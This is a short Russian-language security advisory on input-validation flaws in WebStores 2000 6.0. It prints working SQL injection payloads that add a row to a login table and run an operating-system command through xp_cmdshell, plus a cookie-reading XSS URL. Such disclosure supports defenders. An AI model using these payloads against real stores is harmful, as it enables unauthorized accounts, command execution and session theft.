Программа: Webstores 2000 6.0
Несколько уязвимостей в проверке правильности входных данных обнаружено в WebStores 2000. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционной системы на целевой системе. Удаленный пользователь может выполнить XSS нападение.
1. SQL инъекция в 'browse_item_details.asp':
Search_Text=&Search_Dept=1&SEARCH_
MINPRICE=&SEARCH_MAXPRICE=&S
EARCH_SKU=%25%27+AND+Store_Item
s.Show+%3C%3E+0+AND+Store_Item_Key
word.Store_id%3D1000+and+Store_Items.St
ore_id%3D1000+GROUP+BY+Store_Items.Q
uantity_Minimum%2C+Store_Items.U_d_1_na
me%2C+Store_Items.U_d_2_name%2CStore
_Items.U_d_3_name%2CStore_Items.U_d_4_
name%2C+Store_Item_Keyword.Item_Id%2C
Store_Items.Item_Sku%2C+Store_Items.Item_
Name%2C+Store_Items.Retail_Price%2C+Sto
re_Items.ImageS_id%2C+Store_Items.Item_
Weight%2C+Store_Items.Quantity_in_stock%
2C+Store_Items.Quantity_Control_Number%2
C+Store_Items.Retail_Price_special_Discount%
2C+Store_Items.Special_start_date%2C+Store_I
tems.Special_end_date+ORDER+BY+Count%2
8Store_Item_Keyword.Item_Id%29+DESC%3Bin
sert+into+Mall_Logins+%28Mall_User_Id%2C
+Mall_Password%29+values+%281%2C2%29
--&Search_Store.x=0&Search_Store.y=0
и
Search_Text=&Search_Dept=1&SEARCH_
MINPRICE=&SEARCH_MAXPRICE=&S
EARCH_SKU=%25%27+AND+Store_Ite
ms.Show+%3C%3E+0+AND+Store_Item_K
eyword.Store_id%3D1000+and+Store_Items
.Store_id%3D1000+GROUP+BY+Store_I
tems.Quantity_Minimum%2C+Store_Items.
U_d_1_name%2C+Store_Items.U_d_2_na
me%2CStore_Items.U_d_3_name%2CStor
e_Items.U_d_4_name%2C+Store_Item_Key
word.Item_Id%2CStore_Items.Item_Sku%2
C+Store_Items.Item_Name%2C+Store_Items.
Retail_Price%2C+Store_Items.ImageS_id
%2C+Store_Items.Item_Weight%2C+Store_
Items.Quantity_in_stock%2C+Store_Items.Q
uantity_Control_Number%2C+Store_Items.Re
tail_Price_special_Discount%2C+Store_It
ems.Special_start_date%2C+Store_Items.S
pecial_end_date+ORDER+BY+Count%28S
tore_Item_Keyword.Item_Id%29+DESC%3B
exec+master..xp_cmdshell+%27dir+c%3A+
%3E+c%3A%5Cresdirc.txt%27--&Search_S
tore.x=39&Search_Store.y=4
ХSS:
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>